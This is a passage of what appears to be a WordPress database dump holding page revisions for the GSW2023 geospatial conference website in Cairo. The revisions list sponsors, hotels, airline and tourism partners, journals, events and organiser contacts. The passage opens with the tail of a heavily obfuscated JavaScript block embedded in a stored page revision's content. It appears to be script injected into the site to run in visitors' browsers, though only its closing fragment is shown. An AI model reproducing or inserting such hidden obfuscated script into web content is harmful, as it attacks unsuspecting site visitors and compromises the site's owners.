_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:12:48','2023-08-30 17:12:48','',3066,'https://gsw2023.com/?p=5438',0,'revision','',0),
(5439,1,'2023-08-30 17:19:15','2023-08-30 17:19:15','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" 